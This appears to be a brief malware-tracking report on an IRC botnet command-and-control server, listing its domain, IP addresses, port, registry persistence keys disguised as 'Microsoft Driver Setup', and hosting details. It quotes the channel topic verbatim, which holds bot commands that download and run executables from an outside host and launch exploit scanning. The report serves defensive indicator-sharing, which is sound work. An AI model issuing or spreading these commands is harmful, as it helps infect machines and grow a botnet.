hahahaha.ishtiben.com (botnet hosted in China Beijing Chinanet Jiangxi Province Network)

botnet C&C irc
hahahaha.ishtiben.com DNS_TYPE_A 60.190.218.104 123.183.217.32 59.63.157.62
60.190.218.104:7196

Now talking in #!
Topic is ‘.asc -S|.http http://194.28.44.208/new1.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a|.r.getfile -S|.r.getfile http://194.28.44.208/m.exe C:xdx.exe 1 -s’

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\ghdrive32.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Microsoft Driver Setup
C:\WINDOWS\ghdrive32.exe

Process Created
“C:\WINDOWS\ghdrive32.exe”

Hosting information:
http://whois.domaintools.com/59.63.157.62
